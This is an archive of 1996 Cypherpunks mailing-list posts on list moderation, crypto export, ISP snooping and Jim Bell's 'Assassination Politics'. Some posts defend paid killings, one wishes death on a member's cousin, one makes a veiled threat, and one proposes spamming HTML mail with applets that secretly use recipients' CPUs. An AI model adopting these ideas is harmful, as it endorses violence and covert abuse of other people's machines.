(ETH is Swiss >Federal Institute of Technology) spring to mind. > >Adam One does not need a work permit to travel around Europe staying in various places and writing crypto. Work permits only apply to residents. DCF From dlv at bwalk.dm.com Tue Sep 24 08:35:07 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Tue, 24 Sep 1996 23:35:07 +0800 Subject: Ways to deal with cops Message-ID: Way to go! >Path: ...!news1.erols.com!hunter.premier.net!www.nntp.primenet.com!nntp.primenet.com!news.sgi.com!news.msfc.nasa.gov!newsfeed.internetmci.com!info.ucla.edu!nnrp.info.ucla.edu!oak!zeleny >From: zeleny at oak.math.ucla.edu (Michael Zeleny) >Newsgroups: talk.politics.misc,talk.politics.guns,ca.politics,la.news,misc.legal >Subject: Man Facing Death Sentence For Killing Trespassing Cop >Date: 20 Sep 1996 17:46:21 GMT >Organization: ptyx >Lines: 62 >Message-ID: <51ul9d$21e4 at uni.library.ucla.edu> >NNTP-Posting-Host: oak.math.ucla.edu > >Do you wonder what happens to civilians unwilling to lie down for >police abuse of power? Daniel Allan Tuffree, 49, a former high school >teacher, the testimony in whose trial ended yesterday, has been charged >with first-degree murder in the shooting death of Officer Michael Clark >13 months ago, after three warrantless police officers traipsed on his >front lawn with their guns drawn -- to check on his welfare. The case, >which is presided over by the notoriously prosecution-friendly Judge >Allan L. Steele in the Simi Valley courthouse that hosted the acquittal >of Rodney King's uniformed assailants in their first trial, will go to >the jury in early October after jury instructions are drawn and lawyers >make their closing arguments. Tuffree faces a possible death sentence. > >Clark was one of three police officers sent to Tuffree's home on >August 4, 1995, after reports that the former Chatsworth High School >teacher had been drinking alcohol, taking Valium and was possibly >suicidal. A gunfight began shortly after police walked into Tuffree's >backyard and started asking him questions, refusing his order to leave >his property. Defense attorneys have argued that Clark fired on >Tuffree first and that police acted improperly. They called expert >witnesses who testified that police should have walked away once they >realized that Tuffree was not hurt or suicidal. > >Lou Reiter, a retired Los Angeles Police Department commander, >testified that Simi Valley police officers made one mistake after >another when they came to Tuffree's home. According to Reiter's >testimony, the three police officers were working with third-hand >information when they arrived at the scene. Before taking action, >they did not devise a plan in case a confrontation occurred with >Tuffree, who was a known gun owner. And they did not announce >themselves before walking into Tuffree's backyard with their guns >drawn, all actions that could have aggravated a distraught man who >reportedly had been drinking alcohol, taking Valium and who had >stopped answering his phone. "No one had anticipated or made an >evaluation of what would happen if things didn't go right," said >Reiter, a private consultant on police procedure who was an LAPD >officer for 20 years. He also told the jury that he believed Simi >Valley Police Sergeant Anthony Anzilotti to have been negligible in >his role as the supervising officer on scene that day, testifying that >"in [his] opinion [Anzilotti] didn't supervise at all." And he said >Clark erred by not walking away from Tuffree's kitchen window once he >realized the former schoolteacher was conscious and not injured: "The >emergency is over; therefore, the right to be in his backyard is >over." > >Reiter denied the claims of two other police experts called by the >prosecution, both of whom testified that Simi Valley police officers >sent to Tuffree's house last summer had a "moral, ethical, and legal" >obligation to follow through with the request to check on Tuffree's >welfare, having no choice but to get close enough to make direct >contact with Tuffree in order to ensure that he was safe. But Reiter, >who retired from the LAPD in 1981, said that "officers always have a >choice," explaining that there are situations in which police can walk >away once they have determined that a person is safe. "There are a >lot of people in their homes that are not confronting a medical >emergency who just want to be left alone," he said. > >See http://www.latimes.com/HOME/COMMUN/NEWS/ZONE26B for more information. > >Cordially, - Mikhail | God: "Sum id quod sum." Descartes: "Cogito ergo sum." >Zeleny at math.ucla.edu | Popeye: "Sum id quod sum et id totum est quod sum." >itinerant philosopher -- will think for food ** www.ptyx.com ** MZ at ptyx.com >ptyx ** 6869 Pacific View Drive, LA, CA 90068 ** 213-876-8234/874-4745 (fax) From DMiskell at envirolink.org Tue Sep 24 08:39:19 1996 From: DMiskell at envirolink.org (Daniel Miskell) Date: Tue, 24 Sep 1996 23:39:19 +0800 Subject: Banning annoying users Message-ID: <199609241158.HAA27269@envirolink.org> The not allowing unsubscribed individuals to post is logical, for a time. But that basically outlaws anon remailers that don't allow you to send to an account, and a lot of them don't, from my limited understanding. Besides, if we set up the list to ban people who are 'undesirable', instead of just using our own killfiles to do the dirty work for the list, then what is to stop someone from banning you? Sure, you move on to another list, but, personally, I wouldn't want it done to me, and so I would not do it to someone else. But, like I said, personal killfiles are more than encouraged. It resolves these kinds of conflicts a lot faster and cleaner than debating who and who should not be banned. --- Daniel. -- If in fact we are the only intelligent life on this planet, why the fuck are we in this goddamn mess? -- Find my public key on the World Wide Web -- point your browser at: http://bs.mit.edu:8001/pks-toplev.html From jlv at signet.sig.bsh.com Tue Sep 24 09:12:16 1996 From: jlv at signet.sig.bsh.com (Jason Vagner) Date: Wed, 25 Sep 1996 00:12:16 +0800 Subject: Snooping ISP admin?? In-Reply-To: <199609232112.QAA07155@xanadu.io.com> Message-ID: > > Question for the group: I have encountered a situation that causes me > > to believe an ISP is snoopingthrough encrytped mail. It seems that > > PGP'd mail has aroused the curiosity of an ISP (not hooked.net).. I have > > encountered "POP3 account in use by another user" several times in the > > past few days and I am the only user... wondering if that "in use" > > messsage is the result of a clumsy sysadmin being caught with his hand > > in the cookie jar. Any thoughts from the group??? If those more > > knowledgeable than I deem these NOISE... my sincere apologies. > > An admin could just copy the mail spool file to a safer place, then read > through at their leisure. > > Unless its someone totally clueless (which some ISP's are), I doubt that > they are pulling off the pop3d. It could be that your mail spool file is > locked by a mail transport agent, and that is why that error message is > occuring. > > Any thoughts? As someone who has operated an ISP himself, I would say that the likelihood of this being a system problem is very high. Especially if this is a relatively new ISP, or if they've upgraded anything at all on their mail server, it's pretty easy to break the delicate balance of daemons and permissions such that this problem could easily occur. It's worth a call to their technical support line (I know.. I'm sure it's always busy) just to inform them of the problem. Sometimes it'll time out (if it's one kind of problem) and sometimes it'll hang there until a lock file is specifically removed (a different kind of problem). All other comments regarding the likelihood that a sysadmin would try to read mail in the real environment apply. Jason From sandfort at crl.com Tue Sep 24 10:20:01 1996 From: sandfort at crl.com (Sandy Sandfort) Date: Wed, 25 Sep 1996 01:20:01 +0800 Subject: WHO IS MAKING A MOCKERY OF WHOM? In-Reply-To: <199609240520.WAA22684@abraham.cs.berkeley.edu> Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, Time for another informal poll. On Mon, 23 Sep 1996, John Anonymous MacDonald wrote: > What a joy to make a public mockery of Tim Mayo! Do list members think Anonymous' posts make a public mockery of Tim May or Anonymous? Let me know whose reputation you think is enhanced or tarnished by these posts. I'll post a summary to the list in a week or two. Thanks, S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From KM5Y75088 at aol.com Tue Sep 24 10:24:30 1996 From: KM5Y75088 at aol.com (KM5Y75088 at aol.com) Date: Wed, 25 Sep 1996 01:24:30 +0800 Subject: crypto help..system help Message-ID: <960924092527_484293026@emout03.mail.aol.com> I am tryint to get involved with crypto and have had a long-distance helper but we are having problems getting our 3.1 based system working with win 95. Uses a GUI programmed in 16 bit visual basic. Need someone willing to come over and help . Dallas area zip 75030 or 75088..... From m5 at tivoli.com Tue Sep 24 10:46:26 1996 From: m5 at tivoli.com (Mike McNally) Date: Wed, 25 Sep 1996 01:46:26 +0800 Subject: Bork book Message-ID: <3247E5B8.6181@tivoli.com> Robert Bork was on NBC (I think) being interviewed to plug his hot new book "Slouching Towards Gomorrah" (or something like that). The snippet of interview I caught was the last part, with the interviewer asking how Bork could reconcile his desire that we all be more free with his notion that we let the Constitution "control" us, and that legislatures should be able to outlaw all the profanity and indecency that they want. Any of the cypherpunk.lawyers seen this? Bork came across as kind-of a jerk, personality-wise. -- ______c_________________________________________________________________ Mike M Nally * IBM % Tivoli * Austin TX * How quickly we forget that mailto:m5 at tivoli.com mailto:m101 at io.com * "deer processing" and "data http://www.io.com/~m101/ * processing" are different! From gary at systemics.com Tue Sep 24 10:53:08 1996 From: gary at systemics.com (Gary Howland) Date: Wed, 25 Sep 1996 01:53:08 +0800 Subject: provably hard PK cryptosystems In-Reply-To: Message-ID: <3247E194.3F54BC7E@systemics.com> Asgaard wrote: > > On Sun, 22 Sep 1996, Timothy C. May wrote: > > > Suppose a tile is placed at some place on the grid, and another tile > > (possibly a different tile, possibly the same type of tile) is placed some > > distance away on the grid. The problem is this: Can a "domino snake" be > > found which reaches from the first tile to the second tile, with the > > constraint that edges must match up on all tiles? (And all tiles must be in > > normal grid locations, of course) > > Intuitively (but very well not, I'm not informed enough to know) > this might be a suitable problem for Hellman's DNA computer, the > one used for chaining the shortest route including a defined > number of cities? This is starting to sound like Wired magazine. I fail to see *any* (non educational) use for these DNA "computers", let alone a cryptographic use - sure, they may be massively parallel, but what's the big deal? I can now perform a calculation a million times faster than I could yesterday? (something I personally doubt, but will agree to for sake of the argument). I could get the same results writing a cycle stealing Internet java app, so what's all the fuss about? L8r d00d2 DNA Mutant -- pub 1024/C001D00D 1996/01/22 Gary Howland Key fingerprint = 0C FB 60 61 4D 3B 24 7D 1C 89 1D BE 1F EE 09 06 From bkmarsh at feist.com Tue Sep 24 10:55:55 1996 From: bkmarsh at feist.com (Bruce M.) Date: Wed, 25 Sep 1996 01:55:55 +0800 Subject: Previous disk erasing thread Message-ID: ---------- Forwarded message ---------- Date: Thu, 05 SEP 1996 10:23:32 -0700 To: Steve Harris Newgroups: alt.security Subject: Re: Security Disk Washer Steve Harris wrote: > > When you delete files, you don't really remove the data. DOS simply > marks the area as available for overwriting by new data. Sometimes > this is useful - the "Undelete" program exploits this to allow you to > recover accidentally deleted files. On other occasions, this is a > security risk - you want to prevent people recovering confidential > data. > > This program stops people recovering the data. It wipes all the unused > disk area with random data. This technique provides "after the fact" > protection. Imagine putting all your old confidential documents in a > trash can. "Washer" shreds all the documents in the trash. > > Download your free copy from > http://www.compulink.co.uk/~net-services/wash/ > > Steve Harris - Net Services - Making E-Mail privacy easy > with PGP. http://www.compulink.co.uk/~net-services/pgp/ From gary at systemics.com Tue Sep 24 11:04:59 1996 From: gary at systemics.com (Gary Howland) Date: Wed, 25 Sep 1996 02:04:59 +0800 Subject: Hallam-Baker demands more repudiations or he'll write! In-Reply-To: Message-ID: <3247E8DF.FF6D5DF@systemics.com> Timothy C. May wrote: > > At 2:10 AM 9/24/96, hallam at vesuvius.ai.mit.edu wrote: > > >like Markof are somewhat more responsible. This is not going to stop me > >from producing an op-ed piece linkiing the net libertarians to assasination > >politics unless I hear a few more repudiations of Bell's ideas. If you > >don't very clearly reject his murderous ideas you are going to regret it > >just as the left regreted having the USSR or the RAF associated with them. > > I for one don't respond well to extortion threats, so write your damned article. Seconded. You know, the real problem with the average blackmailer is that they rarely give you the offer as a legal document - if we fulfil our side of the bargain, how can we be sure he fulfils his, and doesn't change his mind next time someone half agrees with a pro AP/Legal-blackmail/Tax-haven/Libertarian-state/freedom-of-speech/whatever post? We obviously need some sort of legal contract to solve this problem, but no, that's not possible in most countries, is it?. How convenient. Till next time Phill ... Gary -- "Of course the US Constitution isn't perfect; but it's a lot better than what we have now." -- Unknown. pub 1024/C001D00D 1996/01/22 Gary Howland Key fingerprint = 0C FB 60 61 4D 3B 24 7D 1C 89 1D BE 1F EE 09 06 From declan at eff.org Tue Sep 24 11:05:43 1996 From: declan at eff.org (Declan McCullagh) Date: Wed, 25 Sep 1996 02:05:43 +0800 Subject: We removed radikal 154 from xs4all :( In-Reply-To: <199609232122.OAA15542@atropos.c2.org> Message-ID: I agree with Sameer -- I don't think Germany wins. The information is still online. A quick Altavista search will take you to it. The mirror sites' continued existence forces Gemany's hand; now they'll have to try and block the rest of the sites. -Declan On Mon, 23 Sep 1996 sameer at c2.net wrote: > > Unfortunately, this means that Germany wins. > > How does this mean that Germany wins? "radikal 154" is still > available all over the world, at almost 50 mirror sites, I beleive > (including http://www.c2.net/radikal/), which are *not* blocked by > Germany. > > -- > Sameer Parekh Voice: 510-986-8770 > C2Net FAX: 510-986-8777 > The Internet Privacy Provider > http://www.c2.net/ sameer at c2.net > // declan at eff.org // I do not represent the EFF // declan at well.com // From pjb at ny.ubs.com Tue Sep 24 11:08:00 1996 From: pjb at ny.ubs.com (pjb at ny.ubs.com) Date: Wed, 25 Sep 1996 02:08:00 +0800 Subject: We removed radikal 154 from xs4all :( Message-ID: <199609241328.JAA12601@sherry.ny.ubs.com> i was under the impression that germany's goal was to stop the distribution of radikal 154 by xs4all, not by 50 mirror sites. they seem to have accomplished their goal. do you really think that they will let a little thing like reason stand in their way when claiming victory? -paul > From cypherpunks-errors at toad.com Tue Sep 24 06:43:51 1996 > From: sameer at c2.net > Subject: Re: We removed radikal 154 from xs4all :( > To: tcmay at got.net (Timothy C. May) > Date: Mon, 23 Sep 1996 14:22:40 -0700 (PDT) > Cc: tank at xs4all.nl, cypherpunks at toad.com > X-Mailer: ELM [version 2.4 PL24 ME8a] > Mime-Version: 1.0 > Content-Type> : > text/plain> ; > charset=US-ASCII> > Content-Transfer-Encoding: 7bit > Sender: owner-cypherpunks at toad.com > Content-Length: 397 > > > Unfortunately, this means that Germany wins. > > How does this mean that Germany wins? "radikal 154" is still > available all over the world, at almost 50 mirror sites, I beleive > (including http://www.c2.net/radikal/), which are *not* blocked by > Germany. > > -- > Sameer Parekh Voice: 510-986-8770 > C2Net FAX: 510-986-8777 > The Internet Privacy Provider > http://www.c2.net/ sameer at c2.net > From m5 at tivoli.com Tue Sep 24 11:35:32 1996 From: m5 at tivoli.com (Mike McNally) Date: Wed, 25 Sep 1996 02:35:32 +0800 Subject: provably hard PK cryptosystems In-Reply-To: Message-ID: <3247ECCA.7743@tivoli.com> Gary Howland wrote: > writing a cycle stealing Internet java app... And remember, you can do that simply by putting your applet in an HTML document and then spam-mailing the document with appropriate MIME header information to zillions of people. Everybody who's reading mail with Netscape (and maybe IE) will see your little HTML document (which needn't be anything special), and your applet will be able to fire up and start stealing cycles. In fact, it'd be cool to set up a mail sender that would construct such a page automatically with each outgoing mail message. That way, ordinary postings to mailing lists would go out with that spiffy HTML look, and you'd get all those CPU cycles without angering the community (much). -- ______c_________________________________________________________________ Mike M Nally * IBM % Tivoli * Austin TX * How quickly we forget that mailto:m5 at tivoli.com mailto:m101 at io.com * "deer processing" and "data http://www.io.com/~m101/ * processing" are different! From dthorn at gte.net Tue Sep 24 11:47:13 1996 From: dthorn at gte.net (Dale Thorn) Date: Wed, 25 Sep 1996 02:47:13 +0800 Subject: AP [was: Re: Kiddie porn on the Internet] [NOISE] In-Reply-To: <199609240135.SAA23298@mail.pacifier.com> Message-ID: <3247EF0D.6D1D@gte.net> jim bell wrote: > At 05:48 PM 9/23/96 -0400, hallam at vesuvius.ai.mit.edu wrote: > >So Jim Bell is opposed to "truly random attacks on ordinary citizens" > >Its this type ofappoligia for terrorism that disgusts me utterly. > >He is calling for murder but wants to dress it up in whatever > >psychotic justifications he can. > >He is also completely wrong. When the IRA attemoted to assasinate my > >cousin I was in no way intimidated and neither was he. He continued > >as a senior poitician for over a decade despite continued danger. I > >can think of no less effective method of bringing about change in > >attitudes. And he, along with others, failed to solve the problems as > >well. Is this progress? > >I am in no way intimidated by Bell either. He is a kook and I don;t > >think it he is worth further consideration. > For the record, if an AP-type system were to operate it would: > 1. Make it impossible for the British to continue to station troops > in Northern Ireland, an eventuality that I suppose Phill resists. > However, it would also: > 2. Make it impossible and unnecessary for the British to have any > troops anywhere, because it would eliminate its government and > military. It would no longer be a country, merely an island with > people living there. > 3. Make it unnecessary in Northern Ireland to protect the Catholics > from > the Protestants, or the Protestants from the Catholics, because the > trouble-makers from both (all?) sides would be quickly erased from the > scene. Nobody would rule anybody. Nobody COULD rule anybody. All > factions would either be peaceful or dead, their choice. No political > advantage could be gained by violence, because all politics would have > ceased. > 4. Make it unnecessary and pointless for Northern Ireland to re-unify > with > Ireland, because likewise the government and military of Ireland would > dissolve, as well as all political structure in that land as well. > In short, the only reasons that the current problems are maintained in > Northern Ireland and Britain would be eliminated by the advent of AP. > So who is the "kook," really? Lessee if I have this right, now. We have basically three scenarios: 1. Allow the status quo to continue (the justice system scam now run by Janet Reno/Louis Freeh types et al. 2. Allow the people some democracy in applying justice through AP. 3. Sometime in the future, build the Gort(?) robots, as in The Day The Earth Stood Still, and let them do the job. Whatcha think? From pgf at acadian.net Tue Sep 24 11:59:02 1996 From: pgf at acadian.net (Phil Fraering) Date: Wed, 25 Sep 1996 02:59:02 +0800 Subject: AP [was: Re: Kiddie porn on the Internet] [NOISE] In-Reply-To: <6XJquD10w165w@bwalk.dm.com> Message-ID: On Mon, 23 Sep 1996, Dr.Dimitri Vulis KOTM wrote: > There is no such thing as an "ordinary citizen". When the U.S. commits > war crimes in Korea, Viet Nam, Grenada, Panama, Somalia, Iraq, and elsewhere, > every American taxpayer is an accomplice and a fair game. Likewise, any > Britih subject is fair game for IRA's self-defense against centuries of > British genocide and oppression. Are you aware that from the _American_ point of view, we suffered from Russian war crimes in Korea and elsewhere? Where are the POW's that are missing from that war? > > It's a pity the IRA didn't nail your cousin. I wish them better luck next time. > If I were you I wouldn't advocate murder based on nationality; there are lots of swamps in this state that can decompose bodies completely in six months. Even the bones are gone. Phil Fraering pgf at acadian.net 318/261-9649 From Mullen.Patrick at mail.ndhm.gtegsc.com Tue Sep 24 12:08:21 1996 From: Mullen.Patrick at mail.ndhm.gtegsc.com (Mullen Patrick) Date: Wed, 25 Sep 1996 03:08:21 +0800 Subject: List participation (noise) Message-ID: I don't know why you guys rank on Tim May so much. Sure, he goes off topic sometimes. Hell, THIS MESSAGE IS OFF TOPIC AS IS THE MESSAGE I'M REPLYING TO! Get the point? Today, I had to delete more than 15 messages related to telling everyone how much of an asshole Tim is because he speaks off topic. Hello? Aren't these blatent (and I feel totally unwarranted) flames off topic? I think everyone should take a step back and look what's happening here. Everyone is so eager to point fingers, and they don't look at the fact that when you first get to your mail in the morning, there are over 100, even over 150 messages waiting for you! Of course, after deleting all of the noise (Thank God that damned TWA thread finally died!), you have maybe 50 messages you have to skim through, of which maybe 10 or 20 survive and go to the archive list of useful information. Maybe I should just stay out of it, but I feel these constant flamings of Tim are horribly wrong, and I've been ignoring the fact that I have to delete 20 messages about him every day for the past week. I actually find a lot of his postings interesting. Yes, half of his postings get the insta-delete-never-even-considered-for-reading treatment, but I just read an insightful message about "provably hard cryptosystems." Cryptosystems- Hm. Imagine that. Cryptosystems mentioned on a list call "Cypherpunks." ... And I thought it was the "Fuck the CIA, let's spread rumors about the US military shooting down commercial airliners out of New York, spam the spammers, kiddie-porn-on-the-net" discussion group... And now the disclaimer... Even with all of the noise, there is a lot of good information on this list, but my delete key is wearing out! :-) And please, if you don't have anything important to say, don't say anything. Posting noise does nothing but generate more noise (Hm... I wonder how much I've just generated! :-) Patrick _______________________________________________________________________________ From: Eric Hughes on Tue, Sep 24, 1996 6:38 Subject: List participation To: cypherpunks at TOAD.COM I have been informed that Dr.Dimitri Vulis KOTM wrote: > [...] Tim's off-topic spews have driven Eric Hughes, John Gilmore, > Rich Salz, and many other former valuable contributors off the > mailing list [...] As for me, I stopped having time to read cypherpunks a year and a half ago. Tim had nothing to do with it. The cypherpunks list has changed and I have changed; so be it. Eric ------------------ RFC822 Header Follows ------------------ Received: by mail.ndhm.gtegsc.com with SMTP;24 Sep 1996 06:38:22 -0400 Received: from toad.com by delphi.ndhm.gtegsc.com with SMTP; Tue, 24 Sep 1996 10:35:50 GMT Received: (from majordom at localhost) by toad.com (8.7.5/8.7.3) id KAA22337 for cypherpunks-outgoing; Mon, 23 Sep 1996 10:23:04 -0700 (PDT) Received: from flamingo.sac.net (flamingo.sac.net [207.33.88.33]) by toad.com (8.7.5/8.7.3) with SMTP id KAA22323 for ; Mon, 23 Sep 1996 10:22:55 -0700 (PDT) Received: from mango.sac.net (mango.sac.net [207.33.88.36]) by flamingo.sac.net (8.6.12/8.6.12) with SMTP id KAA10771 for ; Mon, 23 Sep 1996 10:21:54 -0700 Message-Id: <2.2.32.19960923172509.00d6e4e4 at flamingo.remailer.net> X-Sender: eric at flamingo.remailer.net X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Mon, 23 Sep 1996 10:25:09 -0700 To: cypherpunks at TOAD.COM From: Eric Hughes Subject: List participation Sender: owner-cypherpunks at TOAD.COM Precedence: bulk From pgf at acadian.net Tue Sep 24 12:16:11 1996 From: pgf at acadian.net (Phil Fraering) Date: Wed, 25 Sep 1996 03:16:11 +0800 Subject: Public Schools In-Reply-To: Message-ID: On Mon, 23 Sep 1996, Dr.Dimitri Vulis KOTM wrote: > > U.S. public school system is darwinian evolution in action. Parents who can > afford to send their kids to private schools, do so. Parents who send their > kids to public schools deserve to have their offsprings fucked up, mentally > and phsyically, to improve the species' gene pool. But the cutoff is often whether the parents can afford to send their kids to private school, not whether or not they're genetically superior. And the reason it costs so much to send a kid to private school is that everyone's already paying for a more expensive public school thanks to all the taxes. > There are plenty of excellent private elementary and secondary schools in the > U.S. Children who deserve better schooling (by virtue of having parents who > have better genes and are therefore economically successful) get it. So if I'm economically successful it'll change my genes? I guess this is the famous Russian belief in Lamarkianism in action. Phil From dthorn at gte.net Tue Sep 24 12:18:52 1996 From: dthorn at gte.net (Dale Thorn) Date: Wed, 25 Sep 1996 03:18:52 +0800 Subject: Taking crypto out of the U.S. In-Reply-To: Message-ID: <3247E9CF.568D@gte.net> Hamish wrote: > Soon I am going to be going overseas to Japan, and I want to take > my notebook with me so I can keep up with everything, however, I have > encrypted my hard drive and usually encrypt my mail. Is this in > violation of the ITAR to keep everything the same when I go over? Bad enough now that many places require you to put your laptop computer through the big gray x-ray machine (no exceptions in some places, especially federal buildings in the U.S.), but if they start requiring you to list individual files (?????). From mwohler at ix.netcom.com Tue Sep 24 12:24:32 1996 From: mwohler at ix.netcom.com (Marc J. Wohler) Date: Wed, 25 Sep 1996 03:24:32 +0800 Subject: Bork book Message-ID: <199609241525.IAA01531@dfw-ix10.ix.netcom.com> At 08:44 AM 9/24/96 -0500, you wrote: >Robert Bork was on NBC (I think) being interviewed to plug his hot >new book "Slouching Towards Gomorrah" (or something like that). > >Bork came across as kind-of a jerk, personality-wise. >-- Heard him on Limbaugh pushing hard for censorship as a cure for society's problems. Looks like Ted Kennedy & Co. were right to keep him off the court. Marc From attila at primenet.com Tue Sep 24 12:33:36 1996 From: attila at primenet.com (attila) Date: Wed, 25 Sep 1996 03:33:36 +0800 Subject: SAY WHAT? [Hallam-Baker demands more repudiations or he'll write!] Message-ID: <199609241518.JAA08759@InfoWest.COM> At 2:10 AM 9/24/96, hallam at vesuvius.ai.mit.edu wrote: >like Markof are somewhat more responsible. This is not going to stop me >from producing an op-ed piece linkiing the net libertarians to assasination >politics unless I hear a few more repudiations of Bell's ideas. If you >don't very clearly reject his murderous ideas you are going to regret it >just as the left regreted having the USSR or the RAF associated with them. hallam-baker: go back to your beloved England and your labour unions disguised as professional societies. stand on top of the ivory tower and enjoy the view --at least get the top of it out of your anal cavity. try leaving your closet, and smell the flowers. the british are behaving like wimps with their capitulation on privacy and any semblance of gun rights. I'll cast my vote with Tim May --talk in terms of extortion, and I'll tell you what you wish to hear: NO, I will not outright reject Jim Bell's "Assassination Politics." As Jefferson said: "God forbid we should ever be 20 years without such a rebellion. . . . What country can preserve it's liberties if their rulers are not warned from time to time that their people preserve the spirit of resistance?. . .The tree of liberty must be refreshed from time to time with the blood of patriots and tyrants." also, piss off. we can defend american rights without a dawg- eared Brit liberal foaming at the mouth. as to regretting it --I doubt it. the second amendment was written with the idea of a populace who retains their personal rights and is not just another slave to the mafia/fascist form of government which the US has become. something a brit pansy _certainly_ would not understand: LIBERTY IS WORTH DYING FOR! -- one of the few things we all share: the utter, corrosive contempt for our elected officials. From sunder at brainlink.com Tue Sep 24 12:55:02 1996 From: sunder at brainlink.com (Ray Arachelian) Date: Wed, 25 Sep 1996 03:55:02 +0800 Subject: Banning annoying users In-Reply-To: <199609241158.HAA27269@envirolink.org> Message-ID: On Tue, 24 Sep 1996, Daniel Miskell wrote: > The > not allowing unsubscribed individuals to post is logical, for a time. But > that basically outlaws anon remailers that don't allow you to send to an > account, and a lot of them don't, from my limited understanding. Besides, if > we set up the list to ban people who are 'undesirable', instead of just using > our own killfiles to do the dirty work for the list, then what is to stop > someone from banning you? Sure, you move on to another list, but, personally, > I wouldn't want it done to me, and so I would not do it to someone else. But, > like I said, personal killfiles are more than encouraged. It resolves these > kinds of conflicts a lot faster and cleaner than debating who and who should > not be banned. This is wonderful in theory -- and in practice up until now, but what happens when someone decides "Oh, I hate this list and Tim, let me write a spam bot to anonymously spam the this into oblivion?" There is such a thing as denial of service via spamming. It's quite easy to do for someone who knows how to run sendmail and knows how to write a shell script or a small program. Hell, I could write one of those in less than 1 minute. As for me being banned, I doubt it, I'm not posting daily Tim warnings and such spams. yeah, banning someone off the list for their political or even crypto views is silly. Banning someone for spamming is another issue. There is no reason we can't allow posts from those who are not subscribed to the list. There's also no reason that we can't have someone moderate those posts before they make it to the list to remove the spams - mind you not to moderate the contents, but to remove repeating annoying spam and advertisement. As for me, I don't personally give a shit, for as long as assholes like John Anonymous Mac keeps posting "Tim Warnings" I get more users on my filtered cypherpunks list. :) But it's getting really old. ============================================================================= + ^ + | Ray Arachelian |FL| KAOS KERAUNOS KYBERNETOS |==/|\== \|/ |sunder at brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\= <--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/= /|\ | Just Say "No" to |KA|law abridging the freedom of speech' |==\|/== + v + | Janet Reno & GAK |AK| do you not understand? |======= ===================http://www.brainlink.org/~sunder/========================= ActiveX! ActiveX! Format Hard drive? Just say yes! From sales at starnine.com Tue Sep 24 13:07:02 1996 From: sales at starnine.com (StarNine Sales Service) Date: Wed, 25 Sep 1996 04:07:02 +0800 Subject: Reminder on your eval software Message-ID: Dear Macintosh User, Thank you for your interest in our free evaluation software. We hope that you're enjoying working with one of our award-winning Macintosh server products such as WebSTAR, ListSTAR or Quarterdeck Mail. We're sending this message to you as a quick reminder that the serial key for your evaluation copy will expire in approximately three weeks. If for any reason you were unable to successfully download the requested file, we urge you to try downloading again at: . Once you've begun using our software, you should enjoy easy installation and administration. If you experience any difficulties, please consult one of our useful on-line support resources such as our FAQ pages or technical notes at . Of course, you can always receive a personal reply to your questions by sending e-mail to support at starnine.com. After you've had a chance to evaluate whether the program meets the needs of your organization, we urge you to call our sales office at 1-800-525-2580 or (510) 649-4949, or send mail to sales at starnine.com for information regarding pricing and availability. Products may also be purchased via our on-line store: You may want to evaluate one of our other products we offer: * WebSTAR - for easily creating and maintaining dynamic Web sites on your Macintosh. WebSTAR recently won "Software Product of the Year" and "Editor's Choice" award, and now includes Adobe Pagemill for easy Web page creation. * ListSTAR - allowing you to publish email on the Internet. Create your own powerful email discussion groups and Email-On-Demand services, including easy Web site integration. * Quarterdeck Mail (formerly Microsoft Mail for AppleTalk Networks). The easiest client-server email system for Mac networks, now includes one-click browser URL-launching, internet-style signatures and more! * Mail*Link Gateways - connect Quarterdeck Mail or QuickMail to the Internet or Unix systems via the UUCP or SMTP protocols. Please call (800) 525-2580 or mail sales at starnine.com for evaluation copies. Thank you again for your interest in our products. Sincerely, StarNine Technologies, a Quarterdeck Company -------------------------------------------- Phone: 1-800-525-2580 FAX: (510)-548-0393 2550 Ninth Street, Suite 112 Berkeley, CA 94110 From moe-san at stadt.com Tue Sep 24 13:11:18 1996 From: moe-san at stadt.com (D. Moeller) Date: Wed, 25 Sep 1996 04:11:18 +0800 Subject: Where to write crypto? In-Reply-To: <3.0b19.32.19960923075911.00bd74d4@panix.com> Message-ID: <3248059E.1974@stadt.com> Duncan Frissell wrote: > > One does not need a work permit to travel around Europe staying in various > places and writing crypto. Correct, inside EU. > Work permits only apply to residents. One does need a work-permit in Switzerland, since Switzerland is not EU and everybody from an outside country needs one. Cheers Moe! From richieb at teleport.com Tue Sep 24 13:14:45 1996 From: richieb at teleport.com (Rich Burroughs) Date: Wed, 25 Sep 1996 04:14:45 +0800 Subject: Hallam-Baker demands more repudiations or he'll write! Message-ID: <3.0b24.32.19960924064658.006b3540@mail.teleport.com> At 08:33 PM 9/23/96 -0700, tcmay at got.net (Timothy C. May) wrote: >At 2:10 AM 9/24/96, hallam at vesuvius.ai.mit.edu wrote: > >>like Markof are somewhat more responsible. This is not going to stop me >>from producing an op-ed piece linkiing the net libertarians to assasination >>politics unless I hear a few more repudiations of Bell's ideas. If you >>don't very clearly reject his murderous ideas you are going to regret it >>just as the left regreted having the USSR or the RAF associated with them. > >I for one don't respond well to extortion threats, so write your damned article. Anyone who mistakes the lack of "repudiations" for AP on the list for some kind of tacit approval is not getting the whole picture, IMHO. Is this how journalists do their research nowadays -- "give me some info or I'll write something really bad about you that you'll regret?" Cool. I guess I thought there might still be some kind of pursuit of the truth involved. I personally don't have the time or energy to contribute to the AP threads. That != approval for the idea. I hope you include your above quote in your piece. Rich ______________________________________________________________________ Rich Burroughs richieb at teleport.com http://www.teleport.com/~richieb See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon U.S. State Censorship Page at - http://www.teleport.com/~richieb/state New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause From talon57 at well.com Tue Sep 24 13:16:47 1996 From: talon57 at well.com (Brian D Williams) Date: Wed, 25 Sep 1996 04:16:47 +0800 Subject: AP [was kiddie porn on the net] [noise] Message-ID: <199609241613.JAA20109@well.com> Phill states: > I do support the presence of troops in Northern Ireland and >do not consider that to contradict my belief that there should be >a united, autonamous Ireland. I do not believe that the >"loyalists" are in fact loyal to the British way of life, any more >than the KKK are representative of the 